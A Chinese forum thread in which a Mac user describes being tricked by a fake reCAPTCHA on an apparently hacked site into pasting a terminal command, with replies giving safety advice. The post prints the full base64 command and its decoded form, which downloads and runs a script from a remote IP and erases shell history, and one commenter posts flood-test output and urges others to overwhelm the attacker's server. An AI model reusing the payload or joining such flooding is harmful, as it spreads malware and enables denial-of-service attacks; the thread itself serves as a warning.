首页 注册 登录
GoForum🌐 V2EX

一个 reCAPTCHA 把我骗到重装系统,分享出来给大家提个醒

Genieliu111 · 2026-06-19 23:28 · 0 次点赞 · 18 条回复

昨天想查一下今天龙舟赛的安排,就用 DuckDuckGo 快速搜了一下,点进一个网站。https://hkcdba.org/hkidbr (后面查又说是官方网站,是被黑了吗?)

打开之后,弹出了标准的 “I’m not a robot” reCAPTCHA 验证。我很自然地就准备开始点图片验证,结果这次等来的压根不是图片,而是直接弹出了一张指引图,一步一步教我怎么打开终端,粘贴进去运行。应该是在我点击验证的时候,就已经把那段命令自动复制到我的剪贴板了。我当时也没多想,平时 github 里粘贴命令运行已经形成肌肉记忆了,鬼使神差地打开终端,直接粘贴,按下了回车。

运行的命令是这样的

echo 'I am not a robot - reCAPTCHA Verification ID: 432426' && echo 'ZXhwb3J0IFNSQ19VUkw9J2h0dHBzOi8vaGtjZGJhLm9yZy8nICYmIChjZCAvdG1wICYmIGN1cmwgLWtmc1NMICJodHRwOi8vNjIuNjAuMTU1LjE0My80ZjZiYjEyZjk4NDI4N2Q/Zm9yY2U9MSIgLW8gLk5lcWdnZiAmJiBiYXNoIC5OZXFnZ2YgJiYgcm0gLWYgLk5lcWdnZikgPiAvZGV2L251bGwgMj4mMSAmIGNsZWFyOyBwcmludGYgJ1wwMzNbM0onOyBoaXN0b3J5IC1kICQoaGlzdG9yeSAxIDI+L2Rldi9udWxsIHwgYXdrICd7cHJpbnQgJDF9JykgMj4vZGV2L251bGw7IGZjIC1wIC9kZXYvbnVsbCAyPi9kZXYvbnVsbDsgcHJpbnRmICdcbiAgXDAzM1szMm1ceGUyXHg5Y1x4OTMgVmVyaWZpY2F0aW9uIHN1Y2Nlc3NmdWxcMDMzWzBtXG5cbic=' | base64 -D

把里面的 base64 解析出来是这个

export SRC_URL='https://hkcdba.org/' && (cd /tmp && curl -kfsSL "http://62.60.155.143/4f6bb12f984287d?force=1" -o .Neqggf && bash .Neqggf && rm -f .Neqggf) > /dev/null 2>&1 & clear; printf '\033[3J'; history -d $(history 1 2>/dev/null | awk '{print $1}') 2>/dev/null; fc -p /dev/null 2>/dev/null; printf '\n  \033[32m\xe2\x9c\x93 Verification successful\033[0m\n\n'%

命令执行完,终端里立刻用绿色大字打印出了 “Verification successful”。回到网页并没有变化。

但真正的异常才刚刚开始。没过几秒钟,系统突然弹出一个提示,说有一个后台任务正在运行,而且这个任务被伪装成了系统更新进程 “softwareupdate”。

我赶紧去取消这个后台活动,但紧接着,没过多久屏幕上又弹出一个无法关闭的对话框,声称“系统软件已损坏”,要求我输入用户密码。

这时候我已经完全清醒了,不敢再输入任何东西。那个弹窗关也关不掉,我赶紧电源键强制重启。

重启之后问了下 deepseek ,然后赶紧把网络给掐了。后面查 plist ,发现有个伪装的 softwareupdate 的配置。然后今天预约了天才吧把全盘格式化重装了个系统。

18 条回复
laminux29 · 2026-06-19 23:33
#1

有 AI 不用,有 Google 不用,非要去用什么山寨 DuckDuckGo ,这下中招了吧。

burnbrid · 2026-06-19 23:48
#2

没装火绒吗?我刚访问了一下: http://62.60.155.143/4f6bb12f984287d?force=1 ,火绒直接拦截了。

Genieliu111 · 2026-06-19 23:53
#3

@burnbrid 用的 Macbook ,没装杀毒软件。。。你是访问 https://hkcdba.org/hkidbr 就拦截了么?

Genieliu111 · 2026-06-19 23:58
#4

@burnbrid 哦哦,是直接访问

burnbrid · 2026-06-20 00:08
#5

这个 IP 是英国的,坏的很啊,给他压测一下。

dingawm · 2026-06-20 00:13
#6

所以那个是官方网站吗?你的搜索 query 是啥?

UnluckyNinja · 2026-06-20 00:18
#7

老骗局了,伪装成 recaptcha/turnstile 的钓鱼网站,如果你敢运行你不知道有什么实际作用的命令,尤其还是这种长到不能再可疑,那你怎么都会中招的

几个常识:

  • 浏览器环境是独立的沙盒环境,任何需要你在沙盒之外操作什么的,你都应该打十二分精神,起八百个心眼,比如别人看不看的到,有没有可疑内容,有没有人做过( github 上的命令,都是因为有很多人跑过,帮你排雷你才能放心)。这种 BASE64 想藏什么都可以,给你下个原神也不是不行。
  • 装下广告屏蔽类工具吧,比如 ublock origin 扩展之类的,这类工具不光会屏蔽广告,也会屏蔽一些钓鱼木马网站。
  • 验证码最多就应当让你点来点去打几个字符,下次再看到让你再多费一丁点功夫的,直接关掉即可

建议搜搜站里之前的面试钓鱼、telegram 假验证钓鱼(和你这个类似),多看看下次就长个心眼了

burnbrid · 2026-06-20 00:38
#8

:~\( ab -r -n 10000 -c 10000 http://62.60.155.143/4f6bb12f984287d?force=1 This is ApacheBench, Version 2.3 <\)Revision: 1879490 $> Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/ Licensed to The Apache Software Foundation, http://www.apache.org/

Benchmarking 62.60.155.143 (be patient) Completed 1000 requests Completed 2000 requests Completed 3000 requests Completed 4000 requests Completed 5000 requests Completed 6000 requests Completed 7000 requests Completed 8000 requests Completed 9000 requests Completed 10000 requests Finished 10000 requests

Server Software: nginx/1.31.1 Server Hostname: 62.60.155.143 Server Port: 80

Document Path: /4f6bb12f984287d?force=1 Document Length: 0 bytes

Concurrency Level: 10000 Time taken for tests: 134.779 seconds Complete requests: 10000 Failed requests: 13716 (Connect: 0, Receive: 3429, Length: 6858, Exceptions: 3429) Non-2xx responses: 6863 Total transferred: 2569942 bytes HTML transferred: 1387338 bytes Requests per second: 74.20 #/sec Time per request: 134779.155 ms Time per request: 13.478 ms Transfer rate: 18.62 [Kbytes/sec] received

Connection Times (ms)

          min  mean[+/-sd] median   max

Connect: 0 3944 7177.1 2274 69668 Processing: 214 9127 30084.5 316 134215 Waiting: 0 306 922.9 279 35086 Total: 449 13071 30168.8 2936 134215

Percentage of the requests served within a certain time (ms) 50% 2936 66% 4905 75% 7633 80% 9884 90% 27875 95% 134036 98% 134053 99% 134150 100% 134215 (longest request)

帮你压测了一下,但是压不挂对方服务器啊。大家都来压测一下啊,把英国这 B 干死。

UnluckyNinja · 2026-06-20 00:53
#9

https://claude.ai/share/a154c68c-4e52-41fd-8884-53926ff8a6b1 让 AI 分析了下,应该是专门针对的 mac ,而且确实是网站被挂马了,而不是浏览器、链接劫持之类的

把浏览器 UA 修改成如下后可复现( F12 打开 devtools ,左上角设备模拟,尺寸-修改) Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36

burnbrid · 2026-06-20 00:58
#10

压测命令:wrk -t4 -c10000 -d60s –latency http://62.60.155.143/4f6bb12f984287d?force=1 Running 1m test @ http://62.60.155.143/4f6bb12f984287d?force=1 4 threads and 10000 connections Thread Stats Avg Stdev Max +/- Stdev

Latency   352.55ms  194.11ms   2.00s    95.32%
Req/Sec   548.10    342.78     1.78k    69.18%

Latency Distribution

 50%  314.41ms
 75%  342.79ms
 90%  373.46ms
 99%    1.40s

118740 requests in 1.00m, 42.39MB read Socket errors: connect 0, read 891, write 0, timeout 979 Non-2xx or 3xx responses: 118730 Requests/sec: 1977.67 Transfer/sec: 723.02KB

这逼的服务器怪能抗啊

dem0ns · 2026-06-20 01:43
#11

你这命令行也只有 echo 和 base64 解码,没有复制完全吧

UnluckyNinja · 2026-06-20 01:58
#12

@dem0ns 就少了个最后的 | bash

docx · 2026-06-20 03:53
#13

@laminux29 DuckDckGo 用的是 Bing 的数据。关键还是在于网页验证码不可能要求运行脚本。

laminux29 · 2026-06-20 04:13
#14

@docx 我的意思是,正经的搜索引擎,会对网站 URL 做最基本的安全检测。很多常见的黑客工具网站、欺诈网站,在这个阶段就会被 ban

xuejianxianzun · 2026-06-20 04:43
#15

这个骗局我印象里几个月前就在网上看到过说明了。不过一个人机验证的事你能听他的去终端里执行任务,警惕性还需要提高

docx · 2026-06-20 04:43
#16

@laminux29 这是官方网站被黑导致的,与专门挂马的冒牌网站性质不同。Google 同样对这个域名收录并放在第一位。

PeterTerpe · 2026-06-20 04:48
#17

@laminux29 而且 DuckDuckGo 作为 TOR 浏览器的默认搜索引擎,以保护隐私著名,怎么就成不正经的搜索引擎了。

stabc · 2026-06-20 05:38
#18

@laminux29 是不是你不懂的东西就是“山寨”

添加回复
你还需要 登录 后发表回复

登录后可发帖和回复

登录 注册
主题信息
作者: Genieliu111
发布: 2026-06-19
点赞: 0
回复: 0